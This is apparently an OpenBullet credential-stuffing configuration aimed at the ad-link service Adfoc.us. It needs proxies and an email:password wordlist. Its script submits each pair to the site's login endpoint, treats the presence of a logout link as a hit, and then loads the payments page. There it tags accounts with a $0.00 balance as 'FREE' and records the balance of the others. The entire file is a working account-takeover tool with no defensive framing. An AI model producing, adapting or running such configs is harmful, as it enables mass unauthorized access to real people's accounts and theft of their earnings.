[SETTINGS]
{
  "Name": "Adfoc.us | Fraction",
  "SuggestedBots": 50,
  "LastModified": "2019-04-03T22:22:56.9195326+03:00",
  "AdditionalInfo": "",
  "Author": "Fraction",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 10,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://adfoc.us/session/create" 
  CONTENT "email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: ext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<a href=\"/session/destroy\" class=\"header-links\">Logout</a>" 
  KEYCHAIN Failure OR 
    KEY "Enter your e-mail and password below to login to your AdFoc.us account:" 
REQUEST GET "https://adfoc.us/payments" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Account Balance:</strong> <span class=\"balance\" id=\"bold\">$0.00" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Account Balance:</strong> <span class=\"balance\" id=\"bold\">$0.00" 
PARSE "<SOURCE>" LR "<span class=\"balance\" id=\"bold\">" "</span>" -> CAP "Balance" 
